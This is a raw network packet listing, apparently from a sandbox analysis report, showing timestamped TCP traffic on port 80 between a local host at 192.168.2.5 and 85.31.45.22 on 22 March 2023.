Mar 22, 2023 11:21:18.961891890 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961899996 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961971998 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962194920 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962245941 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962291956 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962338924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962414026 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962462902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962462902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962462902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962462902 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962505102 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962549925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962646008 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962783098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962850094 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962866068 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962898970 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.962908983 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962955952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.962989092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963077068 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963238001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963287115 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963332891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963355064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963355064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963382959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963393927 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963464022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963540077 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963656902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963664055 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963726044 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963753939 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963830948 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.963907003 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.963984013 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964106083 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964150906 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964201927 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964260101 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964260101 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964260101 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964283943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964329958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964356899 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964382887 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964421034 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964479923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964606047 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964662075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964703083 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964756012 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964787006 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.964834929 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.964998960 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965045929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965085030 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965104103 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965152979 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965198994 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965209961 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965246916 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965287924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965334892 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965410948 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965466022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965534925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965586901 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965652943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965704918 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965801001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965851068 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.965919018 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.965970039 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966025114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966105938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966144085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966191053 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966201067 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966238976 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966280937 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966335058 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966469049 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966562986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966603041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966677904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966708899 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966758966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.966778040 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966818094 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.966964006 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967009068 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967031956 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967063904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967109919 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967164993 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967170000 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967221022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967302084 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967489004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967573881 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967575073 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967633009 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967781067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967781067 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967845917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.967945099 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.967959881 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968103886 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968152046 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968198061 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968220949 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.968235970 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968283892 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968321085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968410015 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968550920 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968583107 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.968624115 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.968710899 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968830109 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968878031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.968898058 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.968941927 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969013929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969089031 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969155073 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969242096 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969264030 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969289064 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969304085 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969366074 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969412088 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969485044 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969558954 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969666958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969670057 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969731092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.969749928 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.969818115 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970115900 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970163107 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970207930 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970231056 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970231056 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970252037 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970259905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970303059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970315933 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970366955 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970393896 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970458984 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970479965 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970551968 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.970779896 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.970856905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971503019 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971595049 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971635103 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971658945 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971682072 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971698046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971704960 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971725941 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971729994 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971755028 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971757889 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971777916 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971801043 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971807957 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971807957 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971822977 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971823931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.971879005 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971879005 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.971930981 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972001076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972001076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972017050 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972075939 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972115993 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972177029 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972223043 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972250938 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972284079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972320080 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972496986 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972522020 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972570896 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972604990 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972655058 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972716093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972718000 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972791910 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972805977 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.972862959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.972933054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973010063 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973120928 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973190069 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973253012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973280907 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973309040 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973330021 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973393917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973464966 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973618031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973701954 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.973814011 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973841906 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.973891973 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974003077 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974244118 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974328995 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974432945 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974461079 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974486113 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974509954 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974512100 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974535942 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974536896 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974584103 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974590063 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974606991 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974639893 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974653959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974706888 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.974858046 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974883080 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.974967957 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975008965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975008965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975009918 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975121975 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975183964 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975243092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975267887 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975291967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975322008 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975378036 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975430012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975495100 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975522041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975574970 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975688934 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975785971 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975804090 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975855112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.975857973 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975914955 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.975991964 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976041079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976110935 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976162910 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976175070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976239920 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976273060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976339102 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976387978 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976445913 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976520061 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976597071 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976608038 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976663113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976798058 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976857901 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.976907969 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976989031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.976995945 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.977047920 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.986812115 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986843109 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986871004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986891985 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986912966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986932993 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986952066 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986973047 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.986980915 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.986995935 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987021923 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987051010 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987065077 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987076998 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987082005 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987103939 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987108946 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987129927 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987143040 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987154961 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987159014 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987178087 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987198114 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987202883 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987212896 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987231970 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987240076 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987272024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987273932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.987283945 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.987353086 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.010824919 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010859013 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010879993 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010900974 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010921001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010940075 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010962009 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.010967970 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.010982990 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011004925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011008024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011027098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011054993 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011074066 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011084080 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011096001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011097908 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011116982 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011136055 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011153936 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011157036 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011176109 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011193991 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011195898 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011215925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011229992 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011236906 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011254072 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011260033 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011280060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011300087 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011300087 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011320114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011339903 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.011342049 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.011363983 CET	80	49694	85.31.45.22	192.168.2.5
